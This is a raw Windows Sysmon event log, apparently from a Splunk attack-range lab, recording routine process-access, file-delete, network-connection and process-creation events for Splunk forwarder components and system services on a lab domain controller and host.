11:01:02.077{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.077{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-13EE-6216-8306-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.077{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13EE-6216-8306-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.079{C8EA50B7-13EE-6216-8306-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:03.708{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3BC5DB9378EE0419D60FE0BE7AE75E,SHA256=628FCF2DB80FB02502D25C8A11D141D82F5EE1971DFD4E6E8E4DCB2286C9A29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:03.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2050CA136054B30AFDC3A7DE74435077,SHA256=107DF9FDD8B9FA8A75CD5BCAF96D9A0590990F32EC268E67B1045A63BECB59C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:00.695{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51461-false10.0.1.12-8000- 23542300x8000000000000000294126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.723{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E7C9F0D48819D9896C02DC665BFF2B3,SHA256=7C30D9B9283EAD80D443E287D35EF63FA3362726B8125D48C17DA6C85401529E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:04.246{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A5E81F80749CA256C902CFF39650481,SHA256=3F3E85B967AE0F603C831C0718E540BB920D82DCA643CE6B8B785A9815CC249A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13F0-6216-8406-000000003802}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-13F0-6216-8406-000000003802}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.092{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13F0-6216-8406-000000003802}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:04.094{C8EA50B7-13F0-6216-8406-000000003802}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:05.739{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69CC306540FE6213300D3B6A4902D627,SHA256=39890600F45EDC8716F3603C4FC2F9ACB00DE307B5C34ADB5606A2C819477FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:05.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D2BCD0F8179A79CA76AD7A50B375242,SHA256=A18CDA097E71D8AB42CED291A9D597AC4798033839076FFD5413BACC0EE50C2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.497{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53863-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:06.761{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0C0EC8F18541B3E853ACB9A6DEFAE3,SHA256=23C5DA463E3BE4181E54D59D9412C1A68C597C1AE975E73CFFF4D5ECCC6BF3D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:06.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=093A07B21FAC5959F35E00C127F792CB,SHA256=393D1955F9D13314323F7EB7E3672076AEF5F7FBB609352419F7456EBC8F2B8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:03.282{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53864-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:03.282{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53864-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:07.778{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4220B843C11FAA47180AC1606A07D60B,SHA256=5242F32ABEBC7093729D2BADF594F91EC333BD5E740E1658569C8E5A18BA4342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:07.371{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9788D2506A2144C540E5A34D863ED273,SHA256=9884A7C14A068C45CE77CA257BEF6AA782A78266A53E0867ECEADAE4AFB69D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:08.779{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB4CE06B6C5316E0E1EF5B755EA9FA7,SHA256=A92D41BA30B6965BDBCF00133D6FC857AFECE879C0E5930776824FF39E36841E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:08.418{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBB323873D168C13F222B98B66D3302C,SHA256=3071E15837CB99ADC4F9E02E6C9889E866F6D46C50B6605EF6EABBB8608544CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:09.795{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0905E96F6415F1A647CB86A0F54466FF,SHA256=750FD8E1D93671A5CE1EB3603AF455B35487309E7773A85620134F79A59A5A0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:06.601{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51462-false10.0.1.12-8000- 23542300x8000000000000000218477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:09.433{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8459D5F61047520BC1AACF6D3D7C793,SHA256=70BB67CA70060199C70C524EFB7ED28E3ED73655EF70B1ACD231BE9DE4E77C25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:10.959{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E270D740FE1C6BA658CD1FFD277D1AD,SHA256=AA43BE2583EA192ED6767A84890BCF9DDFCDAEFCF43DB31490DBCE099A2C8209,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:10.605{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A3386B38CBBE8F97093A31D6F8EB77,SHA256=ECD0A88F4D0F9269197ABB3F7879270BD601E79175CF4EEB88BBEE86C2945687,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:07.598{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53865-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:11.974{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F507A367C2B3AF1BCA985C9BBFFA1860,SHA256=F59C1DA031275A466C620FA5B1871A5801A4DBB9F5D55AB47F6F280B800EEE49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:11.621{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=554818A86A38404835354B543E165734,SHA256=26CEA0FD777DB4D988547675F0AD798B22638387B3783408531D920AD3128BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:12.683{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A195891AB8AB02ACF328E7DB02B9EA7D,SHA256=1C5C54C9D837FCB775521D10DA89E977E70F8002B375C0747BD6201F1D0FCBFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:13.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7B0DA9C7DF474A80B83937027F6605,SHA256=495CE14DA6340461F3C6699246A5484A3BFC634C949EC9F7276E1B04F776B558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:13.017{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8262F9E807F1EF8BE8DD0DA819779A00,SHA256=9AB4628710AB8E19117CE3C7BA7BC0DF0D7479FFAD13EA5364883B80BEF0B80F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:11.663{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51463-false10.0.1.12-8000- 23542300x8000000000000000218482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:13.550{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-144MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:14.707{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 